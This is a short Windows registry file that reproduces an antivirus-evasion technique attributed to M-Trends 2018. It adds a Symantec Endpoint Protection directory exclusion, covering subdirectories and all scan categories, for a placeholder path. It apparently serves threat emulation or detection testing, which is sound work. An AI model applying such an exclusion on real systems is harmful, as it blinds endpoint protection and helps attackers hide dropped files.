Symantec Endpoint Protection directory exclusion registry key. According to M-Trends 2018, one of the techniques used to evade active AV scanning is to create a directory into which files are dropped and to add that directory to the AV's exclusions via the registry.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions\ScanningEngines\Directory\Client\1733004144]
"Owner"=dword:00000004
"ProtectionTechnology"=dword:00000001
"FirstAction"=dword:00000011
"SecondAction"=dword:00000011
"DirectoryName"="C:\\to\\be\\excluded\\"
"ThreatName"="C:\\to\\be\\excluded\\"
"ExcludeSubDirs"=dword:00000001
"ExtensionList"=""
"ScanCategories"=dword:ffffffff